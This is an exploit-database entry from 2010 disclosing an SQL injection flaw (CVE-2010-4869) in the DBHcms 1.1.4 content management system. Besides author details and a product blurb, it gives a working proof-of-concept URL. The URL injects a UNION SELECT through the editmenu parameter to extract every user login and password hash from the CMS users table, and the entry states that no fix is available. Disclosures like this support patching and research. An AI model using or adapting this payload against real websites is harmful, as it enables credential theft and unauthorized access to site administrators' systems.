DBHcms 1.1.4 - 'dbhcms_pid' SQL Injection



EKU-ID: 21555 CVE: CVE-2010-4869;OSVDB-71321 OSVDB-ID:
Author: ZonTa Published: 2010-10-24 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


DBHcms 1.1.4 SQL Injection Vulnerability

# Exploit Title:    DBHcms 1.1.4 SQL Injection Vulnerability
# Date: 24-10-2010
# Author: ZonTa
# Mail: zontahackers[at]gmail[dot]com
# IM : zontahackers[at]live[dot]com

# Software Link:    http://www.drbenhur.com/downloads-dbhcms-114-1-69-en.html
# Version: 1.1.4
# Tested on: Apache,PHP5


ABOUT
--------------

The DBHcms is a Open Source content management system for personal
and small business websites. It is search engine optimized, also
for multiple languages simultaneously by allowing the search engine
bot to index every single page.


POC
--------------

http://192.168.1.100/DBHcms/index.php?dbhcms_pid=-81&editmenu=-2+union+select+1,2,3,4,5,6,group_concat(user_login,0x3a,user_passwd),8,9,10,11,12,13,14+from+dbhcms_cms_users--


FIX
--------------

Not yet released.


Greetz to Sri Lankanz ~